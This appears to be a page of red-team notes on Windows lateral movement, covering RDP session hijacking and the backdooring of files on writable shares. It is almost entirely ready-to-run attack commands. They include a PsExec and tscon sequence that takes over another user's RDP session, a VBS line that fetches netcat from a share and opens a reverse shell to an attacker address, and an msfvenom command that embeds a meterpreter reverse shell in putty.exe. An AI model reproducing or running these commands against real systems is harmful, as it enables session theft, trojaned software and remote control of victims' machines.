Abusing User Behaviour

RDP hijacking

run cmd as administrator

PsExec64.exe -s cmd.exe
query user
tscon <TARGET ID> /dest:<ACTIVE RDP SESSION>

Windows Server < 2019

Bacdooring

Abusing Writable Shares

backdoor a ruglar file used from a share

Backdooring .vbs Scripts

CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\10.10.28.6\myshare\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe <attacker_ip> 1234", 0, True

Backdooring .exe Files

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=<attacker_ip> lport=4444 -b "\x00" -f exe -o puttyX.exe
PreviousWMINextOther technics

Last updated